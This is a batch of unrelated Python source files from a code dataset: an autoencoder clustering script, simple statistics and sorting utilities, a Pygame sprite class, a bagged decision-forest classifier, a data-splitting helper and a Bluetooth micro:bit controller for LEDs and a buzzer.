layer-wise\n# corruption_levels = [.2, .2, .2, .2]\n# for i in range(sda.n_layers):\n# # go through pretraining epochs\n# for epoch in range(pretraining_epochs):\n# # go through the training set\n# c = []\n# for batch_index in range(n_train_batches):\n# c.append(pretraining_fns[i](index=batch_index,\n# corruption=corruption_levels[i],\n# lr=pretrain_lr))\n# if i == 0:\n# if epoch <> 0:\n# if float(epoch) % 72 == 0:\n# pretrain_lr /= 10\n# print('New learning rate: ', pretrain_lr)\n# print('Pre-training layer %i, epoch %d, cost %f' % (i, epoch, numpy.mean(c)))\n#\n# end_time = timeit.default_timer()\n# try:\n# approot = os.path.split(__file__)[1]\n# except NameError: # We are the main py2exe script, not a module\n# approot = os.path.split(sys.argv[0])[1]\n# print(('The pretraining code for file ' +\n# approot +\n# ' ran for %.2fm' % ((end_time - start_time) / 60.)), file=sys.stderr)\n# # run Kmeans\n# hidden = []\n# for i in range(sda.dA_layers.__len__()):\n# if i == 0:\n# hidden.append(sda.dA_layers[i].get_hidden_values(train_set_x))\n# concat = hidden[i].eval()\n# else:\n# hidden.append(sda.dA_layers[i].get_hidden_values(hidden[i - 1]))\n# concat = numpy.concatenate((concat, hidden[i].eval()), axis=1)\n#\n# out = hidden[i].eval()\n# print('Sda[', i, ']+builtin K-means:')\n# kmeans = KMeans(init='k-means++', n_clusters=nClusters, n_init=20, max_iter=300)\n# y_pred = kmeans.fit_predict(out)\n#\n# print('nmi = ', normalized_mutual_info_score(train_set_y.eval(), y_pred), '\\t acc = ',\n# bestMap(train_set_y.eval(), y_pred), 'inertia=',\n# kmeans.inertia_)\n# # kmeans(out, train_set_y.eval())\n#\n# input_var = T.matrix('inputs')\n# X = numpy.asarray(train_set_x.eval())\n# y = numpy.asarray(train_set_y.eval())\n# nonlinearities = [[lasagne.nonlinearities.rectify, lasagne.nonlinearities.linear],\n# [lasagne.nonlinearities.rectify, lasagne.nonlinearities.rectify],\n# [lasagne.nonlinearities.rectify, lasagne.nonlinearities.rectify],\n# [lasagne.nonlinearities.linear, lasagne.nonlinearities.rectify]]\n# hidden_layers_sizes = [500, 500, 2000, 10]\n# # Deep fine-tuning\n# learning_rate = 0.1\n# init_learning_rate = learning_rate\n# n_epochs = 360\n# learning_rate_shared = theano.shared(lasagne.utils.floatX(learning_rate))\n# encoder, network = build_dA(input_var, n_in=X.shape[1], layer_struct=hidden_layers_sizes, corruption_level=corruption_levels, dA_layers=sda.dA_layers, nonlinearity=nonlinearities)\nreconstruction = lasagne.layers.get_output(network)\nenc_out = lasagne.layers.get_output(encoder)\n\nloss = lasagne.objectives.squared_error(reconstruction, input_var)\n#loss = loss.sum()\nloss = loss.mean()\n\nparams = lasagne.layers.get_all_params(network, trainable=True)\nupdates = lasagne.updates.sgd(\n loss, params, learning_rate=learning_rate_shared)\n\n\n# train_fn = theano.function([input_var], loss, updates=updates)\n#\n#\n# # Finally, launch the training loop.\n# print(\"Starting training...\")\n# # We iterate over epochs:\n# best_val_acc = 0\n# best_result = 0\n# best_batches = 0\n# for epoch in range(n_epochs):\n# # In each epoch, we do a full pass over the training data:\n# train_err = 0\n# train_batches = 0\n# start_time = time.time()\n# hidden_output_concat = []\n# # Training\n# for batch in iterate_minibatches(X, y, batch_size, shuffle=True):\n# inputs, targets, idx = batch\n# minibatch_err = train_fn(inputs)\n# train_err += minibatch_err\n# train_batches += 1\n#\n# print(\"Epoch {} of {}\".format(\n# epoch + 1, n_epochs), \"\\t training loss:\\t\\t{:.6f}\".format(train_err / train_batches), 'time: {:.2f}s'.format(time.time()-start_time))\n#\n# # # Annealing\n# # if epoch > annealing_threshold:\n# # # learning_rate = learning_rate_shared.get_value()\n# # learning_rate = max(0, ((float(n_epochs - epoch)) / float((\n# # n_epochs - annealing_threshold)))) * init_learning_rate # learning_rate - (init_learning_rate/(n_epochs - annealing_threshold))\n# # learning_rate_shared.set_value(lasagne.utils.floatX(learning_rate))\n# if epoch<>0:\n# if float(epoch) % 72 == 0:\n# learning_rate /= 10\n# print('New learning rate: ', learning_rate)\n# learning_rate_shared.set_value(lasagne.utils.floatX(learning_rate))\n#\n\n# ## K-means\nprediction_clean = lasagne.layers.get_output(encoder, deterministic=True)\nf = theano.function([input_var], prediction_clean)\nhidden_out = f(X)\nprediction_noisy = lasagne.layers.get_output(encoder, deterministic=False)\n\n# Get kmeans centroids for weight initialization\n# Baseline Kmeans\nstart_time = timeit.default_timer()\nkmeans_model = KMeans(init='k-means++', n_clusters=nClusters, n_init=20, max_iter=300)\ny_pred = kmeans_model.fit_predict(hidden_out)\ncentroids = kmeans_model.cluster_centers_.T\ncentroids = centroids / numpy.sqrt(numpy.diag(numpy.matmul(centroids.T, centroids)))\ncentroids_shared = theano.shared(numpy.asarray(centroids, dtype=theano.config.floatX), borrow=True)\n\nend_time = timeit.default_timer()\nprint('k-means: \\t nmi = {:.4f} '.format(normalized_mutual_info_score(y, y_pred)),\n '\\t acc = {:.4f} '.format(bestMap(y, y_pred)),\n '\\t runtime', end_time - start_time, 'inertia=', kmeans_model.inertia_)\n\n\n# centroids_shared = theano.shared(numpy.asarray(centroids,\n# dtype=theano.config.floatX),\n# borrow=True)\n#\n# # network2 = build_eml(hidden_output)\n#\n#\n# # # Then we print the results for this epoch:\n# # print('epoch:', epoch, 'nmi = ', normalized_mutual_info_score(y, prediction_y),\n# # '\\t arc = ', adjusted_rand_score(y, prediction_y))\n#\n# # print('Sda[Concatenation]+builtin K-means:')\n# # kmeans(concat, train_set_y.eval())\n#\n# finetune_fn = sda.finetuning_functions(train_set_x=train_set_x,\n# batch_size=batch_size, learning_rate_shared=learning_rate_shared, input_var=input_var)\n#\n# print('... finetuning the model')\n# start_time = timeit.default_timer()\n# ## Pre-train layer-wise]\n# for epoch in range(finetuning_epochs):\n# # go through the training set\n# c = []\n# # for batch_index in range(n_train_batches):\n# # c.append(finetune_fn(index=batch_index))\n# for batch in iterate_minibatches(X, y, batch_size, shuffle=True):\n# inputs, targets, idx = batch\n# c.append(finetune_fn(inputs))\n#\n# print('Finetuning , epoch %d, cost %f' % (epoch, numpy.mean(c)))\n# if epoch <> 0:\n# if float(epoch) % 72 == 0:\n# finetune_lr /= 10\n# print('New learning rate: ', finetune_lr)\n# learning_rate_shared.set_value(lasagne.utils.floatX(finetune_lr))\n#\n# hid1 = sda.dA_layers[0].get_hidden_values(input_var)\n# hid2 = sda.dA_layers[1].get_hidden_values(hid1)\n# hid3 = sda.dA_layers[2].get_hidden_values(hid2)\n# hid4 = sda.dA_layers[3].get_hidden_values_linear(hid3)\n# enc_out = theano.function([input_var], hid4)\n# enc_out_val = enc_out(train_set_x.eval())\n#\n# print('deep_SdA_builtin K-means:')\n# kmeans = KMeans(init='k-means++', n_clusters=nClusters, n_init=20, max_iter=300)\n# y_pred = kmeans.fit_predict(enc_out_val)\n#\n# print('nmi = ', normalized_mutual_info_score(train_set_y.eval(), y_pred), '\\t acc = ',\n# bestMap(train_set_y.eval(), y_pred), 'inertia=',\n# kmeans.inertia_)\n","sub_path":"code_3/SdA_deep_dA_theano_2.py","file_name":"SdA_deep_dA_theano_2.py","file_ext":"py","file_size_in_byte":28944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"512310012","text":"import math\n\ndef my_std(sample):\n smean = (sum(sample)/len(sample))\n stdsum = 0\n\n for n in sample:\n stdsum = stdsum + (n-smean)**2\n\n return math.sqrt(stdsum/(len(sample)-1))\n\ns = [71, 73, 73, 74, 74, 75, 76, 77, 77, 79, 81, 83]\nprint(my_std(s))","sub_path":"playing-with-stats/std.py","file_name":"std.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"19692642","text":"import random\nfrom materials.parameters import *\nfrom materials.images import *\n\n\nclass Bird:\n def __init__(self, away_y):\n self.x = random.randrange(550, 730)\n self.y = away_y\n self.width = 55\n self.height = 105\n self.ay = away_y\n self.speed = 3\n self.dest_y = self.speed * random.randrange(20, 70)\n self.img_cnt = 0\n self.cd_hide = 0\n self.come = True\n self.go_away = False\n\n def draw(self):\n if self.img_cnt == 30:\n self.img_cnt = 0\n\n display.blit(bird_img[self.img_cnt // 6], (self.x, self.y))\n self.img_cnt += 1\n\n if self.come and self.cd_hide == 0:\n return 1\n elif self.go_away:\n return 2\n elif self.cd_hide > 0:\n self.cd_hide -= 1\n\n return 0\n\n def show(self):\n if self.y < self.dest_y:\n self.y += self.speed\n else:\n self.come = False\n # self.go_away = True\n self.dest_y = self.ay\n\n def hide(self):\n if self.y > self.dest_y:\n self.y -= self.speed\n else:\n self.come = True\n self.go_away = False\n self.x = random.randrange(550, 730)\n self.dest_y = self.speed * random.randrange(20, 70)\n\n def check_dmg(self, bullet):\n if self.x <= bullet.x <= self.x + self.width:\n if self.y <= bullet.y <= bullet.y + self.height:\n self.go_away = True\n","sub_path":"models/bird.py","file_name":"bird.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"164898096","text":"def matSearch(mat,x):\r\n for r in range(0,len(mat)):\r\n row=mat[r]\r\n l=0\r\n h=len(row)-1\r\n while l<=h:\r\n mid=(l+h)//2\r\n if row[mid]==x:\r\n return [r,mid]\r\n elif xrow[mid]:\r\n l=mid+1\r\n return [-1,-1]\r\n\r\nmat=[[ 1 , 3 , 4 , 5 ],\r\n [ 2 , 6 , 8 , 9 ],\r\n [ 11 , 10 , 13 , 14 ]]\r\nx=9\r\nprint(matSearch(mat,x))\r\n","sub_path":"Byte_by_Byte/9.Matrix_Search.py","file_name":"9.Matrix_Search.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"123132357","text":"from time import time\r\nfrom sort.random_arr import get_arr\r\n\r\narr = get_arr(10000)\r\n\r\n\r\ndef InsertionSort(arr):\r\n for i in range(1, arr.__len__()):\r\n for j in range(i, 0, -1):\r\n if arr[j] < arr[j - 1]:\r\n arr[j], arr[j - 1] = arr[j - 1], arr[j]\r\n\r\nif __name__ == '__main__':\r\n t1 = time()\r\n arr = InsertionSort(arr)\r\n t2 = time()\r\n print(arr)\r\n print(t2 - t1)\r\n","sub_path":"sort/InsertionSort.py","file_name":"InsertionSort.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"622356609","text":"\"\"\"\nfile_write.py\n文件写演示\n\"\"\"\n\n# f = open('file','wb')\nf = open('file','a')\n\n# 写操作\n# f.write(\"hi,死鬼\\n\".encode())\n# f.write(\"哎呀,干啥\\n\".encode())\n\nf.writelines(['hahaha\\n','呵呵呵\\n','嘿嘿嘿'])\n\nf.close()","sub_path":"note/download_note/second_month/IO/day02/file_write.py","file_name":"file_write.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"227223253","text":"\"\"\"\nHaving Two numbers, a and b, find the GCD(Greatst Common denominator)\n\"\"\"\n\ndef gcd(a,b):\n while(b != 0):\n temporary = a\n a = b\n b = temporary % b\n return a\n\n\n# Try out the function with few examples\nprint(gcd(60, 96)) # Should be 12\nprint(gcd(20,8)) # Shoudl be 4 ","sub_path":"learn_data_structures/python/algorithm/gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"288522116","text":"import json\nimport math\nimport statistics\nimport numpy as np\nimport sys\n\n# Set the number of features available\nnumFeatures = 0\n\n# Set the data set directory path\ndataSetPath = '.'\ntrainSetName = '/data/train.csv.home.data'\ntestSetName = '/data/test.csv.home.data'\nvalidateSetPattern = '/data/train%d.csv.home.data'\n\n# The following are global dictionaries used to store the data from various sets (test, train, dev, cross-validate)\ntrainLabelsDictionary = {}\ntrainFeaturesDictionary = {}\nvalidateLabelsDictionary = {}\nvalidateFeaturesDictionary = {}\ntestLabelsDictionary = {}\ntestFeaturesDictionary = {}\n\ndef main(path):\n global trainLabelsDictionary\n global testLabelsDictionary\n global trainFeaturesDictionary\n global testFeaturesDictionary\n global numFeatures\n global dataSetPath\n\n dataSetPath = path\n\n trainLabelsDictionary, trainFeaturesDictionary = readTrainFile()\n testLabelsDictionary, testFeaturesDictionary = readTestFile()\n print(testLabelsDictionary)\n\n features = []\n for featureVector in trainFeaturesDictionary.values():\n features += list(featureVector.keys())\n for featureVector in testFeaturesDictionary.values():\n features += list(featureVector.keys())\n numFeatures = max(features)\n\n print('\\n---------------THESE ARE THE STATISTICS FOR THE DATA SETS---------------')\n\n print('The size of the training set is %d' % (len(trainLabelsDictionary)))\n print('The size of the test set is %d' % (len(testLabelsDictionary)))\n\n print('\\n---------------THESE ARE THE RESULTS FOR THE BAGGED FORESTS---------------')\n\n features = [x for x in range(1,numFeatures+1)]\n trees = []\n for i in range(0,100):\n initialDataSet = np.random.choice(len(trainLabelsDictionary), len(trainLabelsDictionary), replace=True)\n tree = id3Algorithm(initialDataSet, features, None, 0, 3)\n trees.append(tree)\n print('Tree number %d completed' % (i+1))\n\n trainAccuracy, transformedTrainData = evaluate_batch(trainLabelsDictionary, trainFeaturesDictionary, trees)\n testAccuracy, transformedTestData = evaluate_batch(testLabelsDictionary, testFeaturesDictionary, trees)\n print('Train Accuracy = %f Percent\\n' % (trainAccuracy))\n print('Test Accuracy = %f Percent\\n' % (testAccuracy))\n with open('data/trees/train.features.data', 'w') as f:\n json.dump(transformedTrainData, f)\n with open('data/trees/train.labels.data', 'w') as f:\n json.dump(trainLabelsDictionary, f)\n with open('data/trees/test.features.data', 'w') as f:\n json.dump(transformedTestData, f)\n with open('data/trees/test.labels.data', 'w') as f:\n json.dump(testLabelsDictionary, f)\n\n for i in range(0,5):\n validateLabelsDictionary, validateFeaturesDictionary = readValidateTrainFiles(i)\n validateTestLabelsDictionary, validateTestFeaturesDictionary = readValidateTestFile(i)\n validateAccuracy, transformedValidateData = evaluate_batch(validateLabelsDictionary, validateFeaturesDictionary, trees)\n validateTestAccuracy, transformedValidateTestData = evaluate_batch(validateTestLabelsDictionary, validateTestFeaturesDictionary, trees)\n with open('data/trees/split0%d.features.data' % i, 'w') as f:\n json.dump(transformedValidateData, f)\n with open('data/trees/split0%d.labels.data' % i, 'w') as f:\n json.dump(validateLabelsDictionary, f)\n with open('data/trees/split0%d.test.features.data' % i, 'w') as f:\n json.dump(transformedValidateTestData, f)\n with open('data/trees/split0%d.test.labels.data' % i, 'w') as f:\n json.dump(validateTestLabelsDictionary, f)\n\n# The following function reads all but one cross-validation data files\ndef readValidateTrainFiles(heldOutK):\n global dataSetPath\n global validateSetPattern\n trainLines = []\n for i in range(0,5):\n if(i != heldOutK):\n with open((dataSetPath + validateSetPattern % (i))) as trainFile:\n trainLines = trainLines + trainFile.readlines()\n return parseLines(trainLines)\n\n# The following function reads the validation file for cross-validations\ndef readValidateTestFile(fileNumber):\n global dataSetPath\n global validateSetPattern\n validateData = {}\n with open((dataSetPath + validateSetPattern % (fileNumber))) as validateFile:\n validateLines = validateFile.readlines()\n return parseLines(validateLines)\n\n# The following three functions read the training, development, and test data sets\ndef readTrainFile():\n global dataSetPath\n global trainSetName\n with open(dataSetPath + trainSetName) as trainFile:\n trainLines = trainFile.readlines()\n return parseLines(trainLines)\n\ndef readTestFile():\n global dataSetPath\n global testSetName\n with open(dataSetPath + testSetName) as trainFile:\n trainLines = trainFile.readlines()\n return parseLines(trainLines)\n\n# The following functions takes lines from a data file and parses them into labels, feature attributes and their values\n# It returns two dictionaries with common keys, one contains the feature vector, and one contains the label\ndef parseLines(trainLines):\n labelsDictionary = {}\n featuresDictionary = {}\n trainDataList = [line.strip() for line in trainLines]\n for dataIndex in range(0,len(trainDataList)):\n data = trainDataList[dataIndex]\n dataParts = data.split(' ')\n label = -1\n if(dataParts[0] == '1'):\n label = 1\n if(len(dataParts) > 1):\n featureVector = {int(attribute.strip().split(':')[0]): int(attribute.strip().split(':')[1]) for attribute in dataParts[1:]}\n else:\n featureVector = {}\n labelsDictionary[dataIndex] = label\n featuresDictionary[dataIndex] = featureVector\n return labelsDictionary, featuresDictionary\n\n# This function evaluates a batch of trees against a data set by majority voting among the trees\ndef evaluate_batch(labelsDataSet, featuresDataSet, trees):\n totalSamples = len(labelsDataSet)\n correctSamples = 0\n transformedFeaturesSet = {}\n for example in labelsDataSet:\n transformedFeature = {}\n vote_tally = 0\n index = 1\n for tree in trees:\n currentTree = tree\n while(not currentTree.prediction):\n currentFeature = currentTree.feature\n sampleFeatureValue = 0\n if currentFeature in featuresDataSet[example]:\n sampleFeatureValue = 1\n for childTree in currentTree.children:\n if(childTree.featureValue == sampleFeatureValue):\n currentTree = childTree\n break\n vote_tally += currentTree.prediction\n transformedFeature[index] = currentTree.prediction\n index += 1\n transformedFeature[0] = 1\n transformedFeaturesSet[example] = transformedFeature\n predictionValue = 1\n if vote_tally < 0:\n predictionValue = -1\n if labelsDataSet[example] == predictionValue:\n correctSamples += 1\n return (correctSamples/totalSamples)*100, transformedFeaturesSet\n\n# This method returns a decision tree based upon the data set with given depth\ndef id3Algorithm(dataSet, remainingFeatures, featureValue, level, maxDepth):\n global trainFeaturesDictionary\n\n uniformLabels, label = allUniformLabels(dataSet)\n if(uniformLabels):\n newTree = DecisionTree(label, None, featureValue, level)\n return newTree\n elif(len(remainingFeatures) == 0):\n majorityLabel = findMajorityLabel(dataSet)\n newTree = DecisionTree(majorityLabel, None, featureValue, level)\n return newTree\n elif(level >= maxDepth):\n majorityLabel = findMajorityLabel(dataSet)\n newTree = DecisionTree(majorityLabel, None, featureValue, level)\n return newTree\n else:\n bestFeature = findBestRemainingFeature(dataSet, remainingFeatures)\n leftoverFeatures = [x for x in remainingFeatures]\n leftoverFeatures.remove(bestFeature)\n \n newTree = DecisionTree(None, bestFeature, featureValue, level)\n\n positiveDataSet = []\n negativeDataSet = []\n for name in dataSet:\n if(bestFeature in trainFeaturesDictionary[name]):\n positiveDataSet.append(name)\n else:\n negativeDataSet.append(name)\n \n if(len(positiveDataSet) == 0):\n commonLabel = findMajorityLabel(dataSet)\n positiveTree = DecisionTree(commonLabel, None, 1, level+1)\n else:\n positiveTree = id3Algorithm(positiveDataSet, leftoverFeatures, 1, level+1, maxDepth)\n \n if(len(negativeDataSet) == 0):\n commonLabel = findMajorityLabel(dataSet)\n negativeTree = DecisionTree(commonLabel, None, 0, level+1)\n else:\n negativeTree = id3Algorithm(negativeDataSet, leftoverFeatures, 0, level+1, maxDepth)\n \n positiveTree.parent = newTree\n negativeTree.parent = newTree\n newTree.children = [positiveTree, negativeTree]\n return newTree\n\n# This method checks for data sets with uniform labeling\ndef allUniformLabels(dataSet):\n global trainLabelsDictionary\n\n label = trainLabelsDictionary[dataSet[0]]\n for name in dataSet:\n if(trainLabelsDictionary[name] != label):\n return False, label\n return True, label\n\n# This data set finds the majority label of a data set\ndef findMajorityLabel(dataSet):\n numPositiveSamples = len(getPositiveSamples(dataSet))\n numNegativeSamples = len(getNegativeSamples(dataSet))\n if(numPositiveSamples >= numNegativeSamples):\n return 1\n else:\n return -1\n\n# This method finds the best remaining feature based upon information gain\ndef findBestRemainingFeature(dataSet, features):\n if(len(features) == 1):\n return features[0]\n bestFeature = -1\n bestFeatureIG = -1000.0\n numTotalPositiveLabelSamples = len(getPositiveSamples(dataSet))\n numTotalNegativeLabelSamples = len(getNegativeSamples(dataSet))\n totalEntropy = entropy(numTotalPositiveLabelSamples, numTotalNegativeLabelSamples)\n for feature in features:\n featureIG = informationGain(dataSet,feature,totalEntropy)\n if(featureIG > bestFeatureIG):\n bestFeature = feature\n bestFeatureIG = featureIG\n return bestFeature\n\n# This method calculates information gain of a feature over a data set\ndef informationGain(dataSet, feature, totalEntropy):\n global trainFeaturesDictionary\n\n positiveFeatureDataSet = []\n negativeFeatureDataSet = []\n for example in dataSet:\n if feature in trainFeaturesDictionary[example]:\n positiveFeatureDataSet.append(example)\n else:\n negativeFeatureDataSet.append(example)\n \n numTotalSamples = len(dataSet)\n numPositiveFeatureSamples = len(positiveFeatureDataSet)\n numNegativeFeatureSamples = len(negativeFeatureDataSet)\n \n positiveFeatureEntropy = 0\n if(numPositiveFeatureSamples > 0):\n numPositiveFeaturePositiveLabelSamples = len(getPositiveSamples(positiveFeatureDataSet))\n numPositiveFeatureNegativeLabelSamples = len(getNegativeSamples(positiveFeatureDataSet))\n positiveFeatureEntropy = entropy(numPositiveFeaturePositiveLabelSamples, numPositiveFeatureNegativeLabelSamples)\n\n negativeFeatureEntropy = 0\n if(numNegativeFeatureSamples > 0):\n numNegativeFeaturePositiveLabelSamples = len(getPositiveSamples(negativeFeatureDataSet))\n numNegativeFeatureNegativeLabelSamples = len(getNegativeSamples(negativeFeatureDataSet))\n negativeFeatureEntropy = entropy(numNegativeFeaturePositiveLabelSamples, numNegativeFeatureNegativeLabelSamples)\n\n gain = totalEntropy - ((numPositiveFeatureSamples/numTotalSamples)*positiveFeatureEntropy \n + (numNegativeFeatureSamples/numTotalSamples)*negativeFeatureEntropy)\n \n return gain\n\n# This method calculates entropy for a data set\ndef entropy(numPositives, numNegatives):\n total = numPositives + numNegatives\n positiveFraction = numPositives/total\n negativeFraction = numNegatives/total\n if(positiveFraction == negativeFraction):\n return 1\n if(positiveFraction == 0 or negativeFraction == 0):\n return 0\n else: \n positiveLog = positiveFraction*math.log(positiveFraction, 2)\n negativeLog = negativeFraction*math.log(negativeFraction, 2)\n totalEntropy = -positiveLog - negativeLog\n return totalEntropy\n\n# This method returns all positive samples of a data set\ndef getPositiveSamples(dataSet):\n global trainLabelsDictionary\n\n positiveSamples = []\n for example in dataSet:\n if(trainLabelsDictionary[example] == 1):\n positiveSamples.append(example)\n return positiveSamples\n\n# This method returns all negative samples of a data set\ndef getNegativeSamples(dataSet):\n global trainLabelsDictionary\n\n negativeSamples = []\n for example in dataSet:\n if(trainLabelsDictionary[example] == -1):\n negativeSamples.append(example)\n return negativeSamples\n\n# This method prints a decision tree object\ndef printDecisionTree(tree):\n print(tree)\n for child in tree.children:\n printDecisionTree(child)\n\n# This class represents a decision tree\nclass DecisionTree:\n prediction = None\n feature = None\n featureValue = None\n children = []\n parent = None\n level = None\n\n def __init__(self, prediction, feature, featureValue, level):\n self.prediction = prediction\n self.feature = feature\n self.featureValue = featureValue\n self.level = level\n\n def __str__(self):\n printString = ''\n if(self.prediction):\n printString += ('Prediction: %d\\n' % (self.prediction))\n if(self.feature):\n printString += ('Feature: %d\\n' % (self.feature))\n if(self.featureValue):\n printString += ('ParentFeatureValue: %d\\n' % (self.featureValue))\n if(self.level):\n printString += ('Level: %d\\n' % (self.level))\n printString += '\\n'\n return printString\n\n\n\nif __name__ == '__main__':\n main(sys.argv[1])","sub_path":"to_turn_in/Ryan/bagged_forests.py","file_name":"bagged_forests.py","file_ext":"py","file_size_in_byte":14250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"328730401","text":"import os\nimport pandas as pd\nimport collections\n\nimport sklearn.model_selection\n\nimport config\n\n\nclass Split:\n\n def __init__(self, arguments: collections.namedtuple('SplittingArguments',\n ['train_size', 'random_state', 'target', 'strata'])):\n \"\"\"\n\n :param arguments: A collection of named arguments, and their values, for\n the sklearn.model_selection.train_test_split() function\n \"\"\"\n\n self.arguments = arguments\n\n self.configurations = config.Config()\n self.path = os.path.join(self.configurations.warehouse, 'data', 'modelling', 'splits', 'scikit')\n\n def __write(self, training: pd.DataFrame, testing: pd.DataFrame):\n \"\"\"\n\n :param training:\n :param testing:\n :return:\n \"\"\"\n\n training.to_csv(path_or_buf=os.path.join(self.path, 'training.csv'),\n header=True, index=False, encoding='UTF-8')\n testing.to_csv(path_or_buf=os.path.join(self.path, 'testing.csv'),\n header=True, index=False, encoding='UTF-8')\n\n def exc(self, data: pd.DataFrame) -> (pd.DataFrame, pd.DataFrame):\n \"\"\"\n\n :param data:\n :return:\n \"\"\"\n\n x_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(\n data.drop(columns=self.arguments.target),\n data[self.arguments.target],\n train_size=self.arguments.train_size,\n random_state=self.arguments.random_state,\n stratify=data[self.arguments.strata])\n\n training = pd.concat((x_train.reset_index(drop=True), y_train.reset_index(drop=True)), axis=1,\n ignore_index=False)\n testing = pd.concat((x_test.reset_index(drop=True), y_test.reset_index(drop=True)), axis=1,\n ignore_index=False)\n \n self.__write(training=training, testing=testing)\n\n return training, testing\n","sub_path":"risk/functions/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"270362585","text":"\"\"\"\nThis is a simple example of how to read data from a micro:bit.\n\nYou will need the Bluetooth services of the micro:bit exposed.\n\nThis code was developed using the 'Bluetooth Most Services, No Security'\nmicro:bit hex file from:\nhttp://bluetooth-mdw.blogspot.co.uk/p/bbc-microbit.html\n\n\"\"\"\nimport argparse\nimport dbus\nfrom time import sleep\n\nfrom gpiozero import LED\nfrom gpiozero import Buzzer\n\nfrom bluezero import constants\nfrom bluezero import tools\nfrom bluezero import adapter\n\n# constants\nled1 = LED(22)\nled2 = LED(23)\nled3 = LED(24)\nbuzz = Buzzer(5)\nBEEP_TIME = 0.25\n\n\nclass microbit:\n \"\"\"\n Class to introspect Bluez to find the paths for required UUIDs\n \"\"\"\n def __init__(self, address):\n self.bus = dbus.SystemBus()\n self.address = address\n # Device Information\n self.device_path = tools.get_dbus_path(constants.DEVICE_INTERFACE,\n 'Address',\n self.address)[0]\n self.remote_device_obj = self.bus.get_object(\n constants.BLUEZ_SERVICE_NAME,\n self.device_path)\n self.remote_device_methods = dbus.Interface(\n self.remote_device_obj,\n constants.DEVICE_INTERFACE)\n self.remote_device_props = dbus.Interface(self.remote_device_obj,\n dbus.PROPERTIES_IFACE)\n # Button Service\n self.btn_srv_uuid = 'E95D9882-251D-470A-A062-FA1922DFA9A8'\n self.btn_srv_path = None\n # Button A\n self.btn_a_chr_uuid = 'E95DDA90-251D-470A-A062-FA1922DFA9A8'\n self.btn_a_chr_path = None\n # Button B\n self.btn_b_chr_uuid = 'E95DDA91-251D-470A-A062-FA1922DFA9A8'\n self.btn_b_chr_path = None\n\n def connect(self):\n self.remote_device_methods.Connect()\n while not self.remote_device_props.Get(\n constants.DEVICE_INTERFACE,\n 'ServicesResolved'):\n sleep(0.25)\n self._update_dbus_paths()\n\n def _update_dbus_paths(self):\n self.btn_srv_path = tools.uuid_dbus_path(constants.GATT_SERVICE_IFACE,\n self.btn_srv_uuid)[0]\n # Button A\n self.btn_a_chr_path = tools.uuid_dbus_path(constants.GATT_CHRC_IFACE,\n self.btn_a_chr_uuid)[0]\n # Button B\n self.btn_b_chr_path = tools.uuid_dbus_path(constants.GATT_CHRC_IFACE,\n self.btn_b_chr_uuid)[0]\n\n @property\n def connected(self):\n \"\"\"Indicate whether the remote device is currently connected.\"\"\"\n return self.remote_device_props.Get(\n constants.DEVICE_INTERFACE, 'Connected')\n\n def disconnect(self):\n self.remote_device_methods.Disconnect()\n\n def read_button_a(self):\n \"\"\"\n Helper function to read the state of button A on a micro:bit\n :return: integer representing button value\n \"\"\"\n return self.read_button(self.btn_a_chr_path)\n\n def read_button_b(self):\n \"\"\"\n Helper function to read the state of button B on a micro:bit\n :return: integer representing button value\n \"\"\"\n return self.read_button(self.btn_b_chr_path)\n\n def read_button(self, btn_path):\n \"\"\"\n Read the button characteristic on the micro:bit and return value\n :param bus_obj: Object of bus connected to (System Bus)\n :param bluez_path: The Bluez path to the button characteristic\n :return: integer representing button value\n \"\"\"\n\n # Get characteristic interface for data\n btn_obj = self.bus.get_object(constants.BLUEZ_SERVICE_NAME,\n btn_path)\n btn_iface = dbus.Interface(btn_obj, constants.GATT_CHRC_IFACE)\n\n # Read button value\n btn_val = btn_iface.ReadValue(dbus.Array())\n\n answer = int.from_bytes(btn_val, byteorder='little', signed=False)\n return answer\n\n\ndef central(address):\n dongle = adapter.Adapter(adapter.list_adapters()[0])\n if not dongle.powered:\n dongle.powered = True\n # Find nearby devices\n dongle.nearby_discovery()\n\n ubit = microbit(address)\n sense_buttons = True\n\n ubit.connect()\n\n led2.on()\n buzz.on()\n sleep(BEEP_TIME)\n buzz.off()\n\n while sense_buttons:\n btn_a = ubit.read_button_a()\n btn_b = ubit.read_button_b()\n # print('Button states: a={} b={}'.format(btn_a, btn_b))\n if btn_a > 0 and btn_b < 1:\n print('Button A')\n led1.on()\n led3.off()\n elif btn_a < 1 and btn_b > 0:\n print('Button B')\n led1.off()\n led3.on()\n elif btn_a > 0 and btn_b > 0:\n sense_buttons = False\n led1.on()\n led3.on()\n buzz.on()\n sleep(BEEP_TIME)\n buzz.off()\n print('Bye bye!!!')\n elif btn_a < 1 and btn_b < 1:\n led1.off()\n led3.off()\n if not ubit.connected:\n sense_buttons = False\n led1.on()\n led2.on()\n led3.on()\n buzz.on()\n sleep(BEEP_TIME)\n buzz.off()\n\n sleep(0.02)\n\n # Disconnect device\n ubit.disconnect()\n\n # Read the connected status property\n led1.off()\n led2.off()\n led3.off()\n buzz.off()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Use micro:bit as remote for Ryanteck TrafficHAT.')\n parser.add_argument('address',\n help='the address of the micro:bit of interest')\n\n args = parser.parse_args()\n 